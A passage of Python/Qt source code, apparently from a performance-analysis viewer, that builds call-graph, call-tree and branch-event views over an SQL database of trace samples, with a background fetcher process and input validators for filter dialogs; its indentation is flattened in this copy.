" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True;
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time, branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
child_item = CallTreeLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, calls_id, name, dso, count, time, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, calls_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, row, comm_id, thread_id, 0, 0, 0, parent_item)
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, row, parent_item)
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb):
super(CallTreeRootItem, self).__init__(glb, 0, None)
self.dbid = 0
self.query_done = True;
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms")
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb)
def columnCount(self, parent=None):
return 7
def columnHeader(self, column):
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Vertical widget layout
class VBox():
def __init__(self, w1, w2, w3=None):
self.vbox = QWidget()
self.vbox.setLayout(QVBoxLayout());
self.vbox.layout().setContentsMargins(0, 0, 0, 0)
self.vbox.layout().addWidget(w1)
self.vbox.layout().addWidget(w2)
if w3:
self.vbox.layout().addWidget(w3)
def Widget(self):
return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.view = None
self.find_bar = None
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view = QTreeView()
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view = QTreeView()
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
# Child data item finder
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction,pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Background process for SQL data fetcher
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
def WaitForTarget(self):
while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 inidcates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox);
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
percent = ((count - self.start) * 100) / self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Brance data model level two item
class BranchLevelTwoItem():
def __init__(self, row, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * 8
self.data[7] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Brance data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(tot + 16)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Brance data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Branch data preparation
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
return data
# Branch data model
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, parent)
self.event_id = event_id
self.more = True
self.populated = 0
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
if pyside_version_1 and sys.version_info[0] == 3:
prep = BranchDataPrepWA
else:
prep = BranchDataPrep
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
return 8
def columnHeader(self, column):
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if column != 7:
return None
return QFont("Monospace")
def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
self.view.setUniformRowHeights(True)
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
len = metrics.width(str(val) + mm)
max = len if len > max else max
val = self.model.columnHeader(column)
len = metrics.width(str(val) + mm)
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text,Qt.red)
self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.last_time = int(query.value(1))
QueryExec(query, "SELECT time FROM samples WHERE time != 0 ORDER BY id LIMIT 1")
if query.next():
self.first_time = int(query.value(0))
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
